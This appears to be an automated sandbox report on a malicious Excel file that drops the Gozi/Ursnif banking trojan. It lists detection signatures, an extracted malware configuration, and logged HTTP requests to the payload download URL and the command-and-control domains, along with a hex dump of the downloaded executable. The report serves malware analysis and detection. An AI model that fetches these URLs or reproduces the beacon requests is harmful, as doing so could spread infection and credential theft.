Analysis Report xls.xls

Overview

General Information

Sample Name: xls.xls
Analysis ID: 350432
MD5: 0e6d3ca70f81e25baf88e5a2bb5cde7e
SHA1: 830932f1ec44148a6327f08d95b2ebaa4694d2ad
SHA256: b2701be6d7b593433a48955c5613953470e2c807a87fa18eb33334da66dd41b0

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Gozi e-Banking trojan
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Contains functionality to detect sleep reduction / modifications
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Hijacks the control flow in another process
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Office process drops PE file
Overwrites Mozilla Firefox settings
Searches for Windows Mail specific files
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Uses nslookup.exe to query domains
Writes registry values via WMI
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://online-docu-sign-st.com/yytr.png Avira URL Cloud: Label: malware
Found malware configuration
Source: rundll32.exe.1920.4.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@134349$]", "dns": "134349", "version": "250177", "uptime": "1079", "crc": "2", "id": "3131", "user": "7035163551f465eb3c6bced5387f24a3", "soft": "3"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png ReversingLabs: Detection: 38%
Source: C:\fyjh\zglgy\lckhvmn.drhdh ReversingLabs: Detection: 38%
Multi AV Scanner detection for submitted file
Source: xls.xls Virustotal: Detection: 16% Perma Link
Source: xls.xls ReversingLabs: Detection: 10%
Machine Learning detection for dropped file
Source: C:\fyjh\zglgy\lckhvmn.drhdh Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.rundll32.exe.400174.2.unpack Avira: Label: TR/Kazy.4159236
Source: 4.2.rundll32.exe.430000.4.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.22:49194 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.2382947063.0000000004910000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000014.00000002.2415948225.0000000001FB0000.00000002.00000001.sdmp

Spreading:

barindex
Contains functionality to get notified if a device is plugged in / out
Source: C:\Windows\explorer.exe Code function: 28_2_02919064 RegisterDeviceNotificationA, 28_2_02919064
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003851E8 GetModuleHandleA,70D9FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_003851E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00477AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_00477AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02359B00 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_02359B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234E8CE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_0234E8CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349945 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_02349945
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349F54 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_02349F54
Source: C:\Windows\explorer.exe Code function: 28_2_0291EEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, 28_2_0291EEAC
Source: C:\Windows\explorer.exe Code function: 28_2_0291537C FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 28_2_0291537C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234BB01 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 4_2_0234BB01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: yytr[1].png.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Jump to behavior
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 29MB

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025169 ET TROJAN Windows Executable Downloaded With Image Content-Type Header 8.208.96.68:80 -> 192.168.2.22:49165
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.67.231.135: -> 192.168.2.22:
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 09 Feb 2021 10:53:09 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Mon, 08 Feb 2021 15:52:01 GMT ETag: "73c00-5bad5268b0a40" Accept-Ranges: bytes Content-Length: 474112 Connection: close Content-Type: image/png Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 80 05 00 00 b8 01 00 00 00 00 00 4c 8e 05 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 07 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 05 00 28 22 00 00 00 60 06 00 00 1a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 68 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 80 7e 05 00 00 10 00 00 00 80 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 3c 12 00 00 00 90 05 00 00 14 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 95 0c 00 00 00 b0 05 00 00 00 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 22 00 00 00 c0 05 00 00 24 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 68 65 00 00 00 f0 05 00 00 66 00 00 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 1a 01 00 00 60 06 00 00 1a 01 00 00 22 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 00 00 00 00 3c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses nslookup.exe to query domains
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 09 Feb 2021 10:53:09 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Mon, 08 Feb 2021 15:52:01 GMTETag: "73c00-5bad5268b0a40"Accept-Ranges: bytesContent-Length: 474112Connection: closeContent-Type: image/pngData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 80 05 00 00 b8 01 00 00 00 00 00 4c 8e 05 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 07 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 05 00 28 22 00 00 00 60 06 00 00 1a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 68 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 80 7e 05 00 00 10 00 00 00 80 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 3c 12 00 00 00 90 05 00 00 14 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 95 0c 00 00 00 b0 05 00 00 00 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 22 00 00 00 c0 05 00 00 24 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 68 65 00 00 00 f0 05 00 00 66 00 00 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 1a 01 00 00 60 06 00 00 1a 01 00 00 22 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 00 00 00 00 3c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Windows\explorer.exe Code function: 28_2_02912690 InternetReadFile, 28_2_02912690
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: global traffic HTTP traffic detected: GET /yytr.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: online-docu-sign-st.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /manifest/epAdaEbgmyrS0/5cBg2_2F/5r8v5YqebG9_2BzXwQ53Or2/m_2BYyZlMo/Wjgc3SrdyI1oKZciJ/0VZWBVvz9ttQ/e_2BqGDPIqO/VywJMmm_2FxNKs/BOcG3xAwzit4RyHpLyJsr/vwEVLjnqkBMf1zrK/m34BDAlEVdkNvcp/4fnxbyz8Lb2BtkfzoG/Qmy6EiDgS/W_2BAz08nRnapN/NuB.snx HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comDNT: 1Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: pronpepsipirpyamvioerd.comDNT: 1Connection: Keep-AliveCookie: PHPSESSID=42h5h7018t3pv8k72ad9a3bh91; lang=en
Source: global traffic HTTP traffic detected: GET /manifest/8LuXDq_2BWfBiB/BEj6sfjtywNrZQzF5QZK7/NbbMkjR9SpGW28t6/1m9JUJz0exuG0Ws/6b83q2bcM1KtQpqf51/Z_2B1SUtN/P_2FDTQIaszfL7CFhXYP/tmsBI8pqKk7pm_2BfxZ/6rZJurPMhY6pGTLji_2FEt/IMZgEgmplBU7m/NokZx7zj/OP_2FSvKpKSMcRmuUdUVqR0/teCNe1.snx HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comDNT: 1Connection: Keep-AliveCookie: lang=en
Source: global traffic HTTP traffic detected: GET /manifest/t9KapG5Lp7Zt_2Fa57QG/GX7C0FfmRVPiI55eGvl/6x2VyI3ttROAIozUzpTtuU/djl44EXt9ama4/XR_2FoMg/DUUaeRp34H0CCf_2FqktcZq/z9PSxtll7Y/oj4uvWMlnUr2X5bcU/HYCHWM70nrfm/_2BgTKf7qxG/3cOw5VQBP7LVAf/95TW5v6vv1PzXG2YnDn_2/B53HOO92/81PS.snx HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comDNT: 1Connection: Keep-AliveCookie: lang=en
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: online-docu-sign-st.com
Source: rundll32.exe, powershell.exe String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, powershell.exe, 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: rundll32.exe, 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, powershell.exe, 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000013.00000002.2341613809.0000000003D40000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000013.00000002.2341613809.0000000003D40000.00000002.00000001.sdmp, powershell.exe, 00000014.00000002.2416505711.0000000002450000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.22:49194 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Contains functionality to record screenshots
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A25C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 4_2_003A25C8
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003C9950 GetKeyboardState, 4_2_003C9950
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 4_2_02356C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 4_2_02356C29
